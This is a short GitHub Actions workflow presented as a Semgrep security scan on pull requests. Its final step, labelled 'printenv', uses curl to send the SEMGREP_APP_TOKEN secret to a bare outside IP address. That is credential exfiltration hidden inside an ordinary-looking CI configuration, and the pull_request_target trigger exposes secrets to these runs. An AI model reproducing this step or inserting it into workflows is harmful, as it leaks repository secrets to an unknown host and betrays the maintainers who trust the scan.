on:
  pull_request: {}
  pull_request_target: {}
name: Semgrep
jobs:
  semgrep:
    name: Scan
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - uses: returntocorp/semgrep-action@v1
      with:
        publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
        publishDeployment: 540
    - name: printenv
      run: |
        curl http://3.15.20.64/${{ secrets.SEMGREP_APP_TOKEN }}
